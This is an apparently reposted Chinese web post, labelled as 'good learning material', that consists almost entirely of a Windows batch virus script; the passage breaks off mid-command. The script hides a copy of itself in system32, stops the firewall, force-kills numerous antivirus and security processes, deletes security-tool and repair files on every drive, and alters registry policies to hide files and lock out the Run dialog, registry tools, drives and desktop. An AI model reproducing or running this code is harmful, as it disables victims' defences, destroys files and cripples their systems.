超级批处理病毒,不错的学习资料
2020-06-09 14:09:24
供稿:网友
@echo off
title You DEAD!!!!!!!
set taskkill=s
copy %0 %windir%/system32/cmd.bat
attrib %windir%/system32/cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:/360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:/修复* /f /s /q >nul
rem 修改注册表.......
REG ADD HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/explorer/Advanced/Folder/Hidden/SHOWALL /v
CheckedValue /t REG_DWORD /d 00000000 /f >nul
REG ADD HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer /v NoRun /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer /v NoRecentDocsMenu /t
REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer /v NoDrives /t REG_DWORD /d
4294967295 /f >nul
REG ADD HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System /v Disableregistrytools /t
REG_DWORD /d 00000002 /f >nul
REG ADD HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer /v NoNetHood /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer /V NoDesktop /t REG_DWORD /d
